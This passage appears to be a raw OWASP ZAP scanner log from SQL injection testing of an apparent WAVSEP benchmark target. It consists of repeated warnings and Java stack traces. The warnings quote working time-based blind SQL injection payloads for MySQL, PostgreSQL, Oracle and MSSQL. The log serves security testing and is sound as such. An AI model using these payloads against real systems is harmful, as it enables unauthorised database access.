CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt;WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681310 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' AND (SELECT * FROM (SELECT(SLEEP(5)))VnER) AND 'byYR'='byYR] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://' AND (SELECT * FROM (SELECT(SLEEP(5)))VnER) AND 'byYR'='byYR at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681310 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt);SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(76)||CHR(67)||CHR(74)||CHR(90),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt);SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(76)||CHR(67)||CHR(74)||CHR(90),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681311 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' AND (SELECT * FROM (SELECT(SLEEP(5)))yVTu) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://%' AND (SELECT * FROM (SELECT(SLEEP(5)))yVTu) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681312 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(78)||CHR(107)||CHR(116)||CHR(106),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(78)||CHR(107)||CHR(116)||CHR(106),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681313 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ AND (SELECT * FROM (SELECT(SLEEP(5)))IjCD)-- ikmI] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http:// AND (SELECT * FROM (SELECT(SLEEP(5)))IjCD)-- ikmI at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681313 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt');SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(72)||CHR(117)||CHR(120),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt');SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(72)||CHR(117)||CHR(120),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681314 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) AND 5511=(SELECT 5511 FROM PG_SLEEP(5)) AND (7657=7657] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://) AND 5511=(SELECT 5511 FROM PG_SLEEP(5)) AND (7657=7657 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681315 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ AND 3020=(SELECT 3020 FROM PG_SLEEP(5))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http:// AND 3020=(SELECT 3020 FROM PG_SLEEP(5)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681315 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(67)||CHR(65)||CHR(104)||CHR(68),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(67)||CHR(65)||CHR(104)||CHR(68),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681316 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') AND 2734=(SELECT 2734 FROM PG_SLEEP(5)) AND ('OjgM'='OjgM] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://') AND 2734=(SELECT 2734 FROM PG_SLEEP(5)) AND ('OjgM'='OjgM at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681317 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(85)||CHR(71)||CHR(89)||CHR(88),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(85)||CHR(71)||CHR(89)||CHR(88),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681318 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' AND 6858=(SELECT 6858 FROM PG_SLEEP(5)) AND 'jAHe'='jAHe] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://' AND 6858=(SELECT 6858 FROM PG_SLEEP(5)) AND 'jAHe'='jAHe at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681318 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(72)||CHR(67)||CHR(99),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(72)||CHR(67)||CHR(99),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at 